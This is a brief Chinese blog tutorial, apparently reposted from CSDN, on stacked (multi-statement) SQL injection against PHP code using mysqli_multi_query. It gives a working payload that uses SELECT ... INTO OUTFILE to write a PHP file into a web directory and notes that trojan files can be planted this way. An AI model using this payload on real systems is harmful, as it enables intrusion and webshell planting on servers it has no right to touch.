sql注入之堆叠(多语句注入)

条件

源代码使用musqli_multi_quiery();多语句查询函数,即可一次执行多条sql语句

语句

?id=1’;select “<?php phpinfo(); ?>” into outfile “D:\PHPKFGJ\phpstudy\PHPTutorial\WWW\213.php”-- -
在这里插入图片描述

效果

该目录下写入了213.php文件,可由此写入一些木马文件
在这里插入图片描述

发布了16 篇原创文章 · 获赞 4 · 访问量 365

猜你喜欢

转载自blog.csdn.net/wsnbbz/article/details/104253713
今日推荐